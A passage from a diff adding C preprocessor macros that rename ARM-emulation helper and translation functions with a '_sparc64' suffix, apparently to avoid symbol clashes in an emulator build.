gen_helper_udiv gen_helper_udiv_sparc64 +#define gen_helper_uhadd16 gen_helper_uhadd16_sparc64 +#define gen_helper_uhadd8 gen_helper_uhadd8_sparc64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_sparc64 +#define gen_helper_uhsub16 gen_helper_uhsub16_sparc64 +#define gen_helper_uhsub8 gen_helper_uhsub8_sparc64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_sparc64 +#define gen_helper_uqadd16 gen_helper_uqadd16_sparc64 +#define gen_helper_uqadd8 gen_helper_uqadd8_sparc64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_sparc64 +#define gen_helper_uqsub16 gen_helper_uqsub16_sparc64 +#define gen_helper_uqsub8 gen_helper_uqsub8_sparc64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_sparc64 +#define gen_helper_usad8 gen_helper_usad8_sparc64 +#define gen_helper_usat gen_helper_usat_sparc64 +#define gen_helper_usat16 gen_helper_usat16_sparc64 +#define gen_helper_usub16 gen_helper_usub16_sparc64 +#define gen_helper_usub8 gen_helper_usub8_sparc64 +#define gen_helper_usubaddx gen_helper_usubaddx_sparc64 +#define gen_helper_uxtb16 gen_helper_uxtb16_sparc64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_sparc64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_sparc64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_sparc64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_sparc64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_sparc64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_sparc64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_sparc64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_sparc64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_sparc64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_sparc64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_sparc64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_sparc64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_sparc64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_sparc64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_sparc64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_sparc64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_sparc64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_sparc64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_sparc64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_sparc64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_sparc64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_sparc64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_sparc64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_sparc64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_sparc64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_sparc64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_sparc64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_sparc64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_sparc64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_sparc64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_sparc64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_sparc64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_sparc64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_sparc64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_sparc64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_sparc64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_sparc64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_sparc64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_sparc64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_sparc64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_sparc64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_sparc64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_sparc64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_sparc64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_sparc64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_sparc64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_sparc64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_sparc64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_sparc64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_sparc64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_sparc64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_sparc64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_sparc64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_sparc64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_sparc64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_sparc64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_sparc64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_sparc64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_sparc64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_sparc64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_sparc64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_sparc64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_sparc64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_sparc64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_sparc64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_sparc64 +#define gen_helper_wfe gen_helper_wfe_sparc64 +#define gen_helper_wfi gen_helper_wfi_sparc64 +#define gen_hvc gen_hvc_sparc64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_sparc64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_sparc64 +#define gen_iwmmxt_address gen_iwmmxt_address_sparc64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_sparc64 +#define gen_jmp gen_jmp_sparc64 +#define gen_load_and_replicate gen_load_and_replicate_sparc64 +#define gen_load_exclusive gen_load_exclusive_sparc64 +#define gen_logic_CC gen_logic_CC_sparc64 +#define gen_logicq_cc gen_logicq_cc_sparc64 +#define gen_lookup_tb gen_lookup_tb_sparc64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_sparc64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_sparc64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_sparc64 +#define gen_muls_i64_i32 gen_muls_i64_i32_sparc64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_sparc64 +#define gen_mulxy gen_mulxy_sparc64 +#define gen_neon_add gen_neon_add_sparc64 +#define gen_neon_addl gen_neon_addl_sparc64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_sparc64 +#define gen_neon_bsl gen_neon_bsl_sparc64 +#define gen_neon_dup_high16 gen_neon_dup_high16_sparc64 +#define gen_neon_dup_low16 gen_neon_dup_low16_sparc64 +#define gen_neon_dup_u8 gen_neon_dup_u8_sparc64 +#define gen_neon_mull gen_neon_mull_sparc64 +#define gen_neon_narrow gen_neon_narrow_sparc64 +#define gen_neon_narrow_op gen_neon_narrow_op_sparc64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_sparc64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_sparc64 +#define gen_neon_negl gen_neon_negl_sparc64 +#define gen_neon_rsb gen_neon_rsb_sparc64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_sparc64 +#define gen_neon_subl gen_neon_subl_sparc64 +#define gen_neon_trn_u16 gen_neon_trn_u16_sparc64 +#define gen_neon_trn_u8 gen_neon_trn_u8_sparc64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_sparc64 +#define gen_neon_unzip gen_neon_unzip_sparc64 +#define gen_neon_widen gen_neon_widen_sparc64 +#define gen_neon_zip gen_neon_zip_sparc64 +#define gen_new_label gen_new_label_sparc64 +#define gen_nop_hint gen_nop_hint_sparc64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_sparc64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_sparc64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_sparc64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_sparc64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_sparc64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_sparc64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_sparc64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_sparc64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_sparc64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_sparc64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_sparc64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_sparc64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_sparc64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_sparc64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_sparc64 +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_sparc64 +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_sparc64 +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_sparc64 +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_sparc64 +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_sparc64 +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_sparc64 +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_sparc64 +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_sparc64 +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_sparc64 +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_sparc64 +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_sparc64 +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_sparc64 +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_sparc64 +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_sparc64 +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_sparc64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_sparc64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_sparc64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_sparc64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_sparc64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_sparc64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_sparc64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_sparc64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_sparc64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_sparc64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_sparc64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_sparc64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_sparc64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_sparc64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_sparc64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_sparc64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_sparc64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_sparc64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_sparc64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_sparc64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_sparc64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_sparc64 +#define gen_rev16 gen_rev16_sparc64 +#define gen_revsh gen_revsh_sparc64 +#define gen_rfe gen_rfe_sparc64 +#define gen_sar gen_sar_sparc64 +#define gen_sbc_CC gen_sbc_CC_sparc64 +#define gen_sbfx gen_sbfx_sparc64 +#define gen_set_CF_bit31 gen_set_CF_bit31_sparc64 +#define gen_set_condexec gen_set_condexec_sparc64 +#define gen_set_cpsr gen_set_cpsr_sparc64 +#define gen_set_label gen_set_label_sparc64 +#define gen_set_pc_im gen_set_pc_im_sparc64 +#define gen_set_psr gen_set_psr_sparc64 +#define gen_set_psr_im gen_set_psr_im_sparc64 +#define gen_shl gen_shl_sparc64 +#define gen_shr gen_shr_sparc64 +#define gen_smc gen_smc_sparc64 +#define gen_smul_dual gen_smul_dual_sparc64 +#define gen_srs gen_srs_sparc64 +#define gen_ss_advance gen_ss_advance_sparc64 +#define gen_step_complete_exception gen_step_complete_exception_sparc64 +#define gen_store_exclusive gen_store_exclusive_sparc64 +#define gen_storeq_reg gen_storeq_reg_sparc64 +#define gen_sub_carry gen_sub_carry_sparc64 +#define gen_sub_CC gen_sub_CC_sparc64 +#define gen_subq_msw gen_subq_msw_sparc64 +#define gen_swap_half gen_swap_half_sparc64 +#define gen_thumb2_data_op gen_thumb2_data_op_sparc64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_sparc64 +#define gen_ubfx gen_ubfx_sparc64 +#define gen_vfp_abs gen_vfp_abs_sparc64 +#define gen_vfp_add gen_vfp_add_sparc64 +#define gen_vfp_cmp gen_vfp_cmp_sparc64 +#define gen_vfp_cmpe gen_vfp_cmpe_sparc64 +#define gen_vfp_div gen_vfp_div_sparc64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_sparc64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_sparc64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_sparc64 +#define gen_vfp_ld gen_vfp_ld_sparc64 +#define gen_vfp_mrs gen_vfp_mrs_sparc64 +#define gen_vfp_msr gen_vfp_msr_sparc64 +#define gen_vfp_mul gen_vfp_mul_sparc64 +#define gen_vfp_neg gen_vfp_neg_sparc64 +#define gen_vfp_shto gen_vfp_shto_sparc64 +#define gen_vfp_sito gen_vfp_sito_sparc64 +#define gen_vfp_slto gen_vfp_slto_sparc64 +#define gen_vfp_sqrt gen_vfp_sqrt_sparc64 +#define gen_vfp_st gen_vfp_st_sparc64 +#define gen_vfp_sub gen_vfp_sub_sparc64 +#define gen_vfp_tosh gen_vfp_tosh_sparc64 +#define gen_vfp_tosi gen_vfp_tosi_sparc64 +#define gen_vfp_tosiz gen_vfp_tosiz_sparc64 +#define gen_vfp_tosl gen_vfp_tosl_sparc64 +#define gen_vfp_touh gen_vfp_touh_sparc64 +#define gen_vfp_toui gen_vfp_toui_sparc64 +#define gen_vfp_touiz gen_vfp_touiz_sparc64 +#define gen_vfp_toul gen_vfp_toul_sparc64 +#define gen_vfp_uhto gen_vfp_uhto_sparc64 +#define gen_vfp_uito gen_vfp_uito_sparc64 +#define gen_vfp_ulto gen_vfp_ulto_sparc64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_sparc64 +#define get_clock get_clock_sparc64 +#define get_clock_realtime get_clock_realtime_sparc64 +#define get_constraint_priority get_constraint_priority_sparc64 +#define get_float_exception_flags get_float_exception_flags_sparc64 +#define get_float_rounding_mode get_float_rounding_mode_sparc64 +#define get_fpstatus_ptr get_fpstatus_ptr_sparc64 +#define get_level1_table_address get_level1_table_address_sparc64 +#define get_mem_index get_mem_index_sparc64 +#define get_next_param_value get_next_param_value_sparc64 +#define get_opt_name get_opt_name_sparc64 +#define get_opt_value get_opt_value_sparc64 +#define get_page_addr_code get_page_addr_code_sparc64 +#define get_param_value get_param_value_sparc64 +#define get_phys_addr get_phys_addr_sparc64 +#define get_phys_addr_lpae get_phys_addr_lpae_sparc64 +#define get_phys_addr_mpu get_phys_addr_mpu_sparc64 +#define get_phys_addr_v5 get_phys_addr_v5_sparc64 +#define get_phys_addr_v6 get_phys_addr_v6_sparc64 +#define get_system_memory get_system_memory_sparc64 +#define get_ticks_per_sec get_ticks_per_sec_sparc64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_sparc64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__sparc64 +#define gt_cntfrq_access gt_cntfrq_access_sparc64 +#define gt_cnt_read gt_cnt_read_sparc64 +#define gt_cnt_reset gt_cnt_reset_sparc64 +#define gt_counter_access gt_counter_access_sparc64 +#define gt_ctl_write gt_ctl_write_sparc64 +#define gt_cval_write gt_cval_write_sparc64 +#define gt_get_countervalue gt_get_countervalue_sparc64 +#define gt_pct_access gt_pct_access_sparc64 +#define gt_ptimer_access gt_ptimer_access_sparc64 +#define gt_recalc_timer gt_recalc_timer_sparc64 +#define gt_timer_access gt_timer_access_sparc64 +#define gt_tval_read gt_tval_read_sparc64 +#define gt_tval_write gt_tval_write_sparc64 +#define gt_vct_access gt_vct_access_sparc64 +#define gt_vtimer_access gt_vtimer_access_sparc64 +#define guest_phys_blocks_free guest_phys_blocks_free_sparc64 +#define guest_phys_blocks_init guest_phys_blocks_init_sparc64 +#define handle_vcvt handle_vcvt_sparc64 +#define handle_vminmaxnm handle_vminmaxnm_sparc64 +#define handle_vrint handle_vrint_sparc64 +#define handle_vsel handle_vsel_sparc64 +#define has_help_option has_help_option_sparc64 +#define have_bmi1 have_bmi1_sparc64 +#define have_bmi2 have_bmi2_sparc64 +#define hcr_write hcr_write_sparc64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_sparc64 +#define helper_add_saturate helper_add_saturate_sparc64 +#define helper_add_setq helper_add_setq_sparc64 +#define helper_add_usaturate helper_add_usaturate_sparc64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_sparc64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_sparc64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_sparc64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_sparc64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_sparc64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_sparc64 +#define helper_be_stl_mmu helper_be_stl_mmu_sparc64 +#define helper_be_stq_mmu helper_be_stq_mmu_sparc64 +#define helper_be_stw_mmu helper_be_stw_mmu_sparc64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_sparc64 +#define helper_clz_arm helper_clz_arm_sparc64 +#define helper_cpsr_read helper_cpsr_read_sparc64 +#define helper_cpsr_write helper_cpsr_write_sparc64 +#define helper_crc32_arm helper_crc32_arm_sparc64 +#define helper_crc32c helper_crc32c_sparc64 +#define helper_crypto_aese helper_crypto_aese_sparc64 +#define helper_crypto_aesmc helper_crypto_aesmc_sparc64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_sparc64 +#define helper_crypto_sha1h helper_crypto_sha1h_sparc64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_sparc64 +#define helper_crypto_sha256h helper_crypto_sha256h_sparc64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_sparc64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_sparc64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_sparc64 +#define helper_dc_zva helper_dc_zva_sparc64 +#define helper_double_saturate helper_double_saturate_sparc64 +#define helper_exception_internal helper_exception_internal_sparc64 +#define helper_exception_return helper_exception_return_sparc64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_sparc64 +#define helper_get_cp_reg helper_get_cp_reg_sparc64 +#define helper_get_cp_reg64 helper_get_cp_reg64_sparc64 +#define helper_get_r13_banked helper_get_r13_banked_sparc64 +#define helper_get_user_reg helper_get_user_reg_sparc64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_sparc64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_sparc64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_sparc64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_sparc64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_sparc64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_sparc64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_sparc64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_sparc64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_sparc64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_sparc64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_sparc64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_sparc64 +#define helper_iwmmxt_align helper_iwmmxt_align_sparc64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_sparc64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_sparc64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_sparc64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_sparc64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_sparc64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_sparc64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_sparc64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_sparc64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_sparc64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_sparc64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_sparc64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_sparc64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_sparc64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_sparc64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_sparc64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_sparc64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_sparc64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_sparc64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_sparc64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_sparc64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_sparc64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_sparc64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_sparc64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_sparc64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_sparc64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_sparc64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_sparc64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_sparc64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_sparc64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_sparc64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_sparc64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_sparc64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_sparc64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_sparc64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_sparc64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_sparc64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_sparc64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_sparc64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_sparc64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_sparc64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_sparc64 +#define 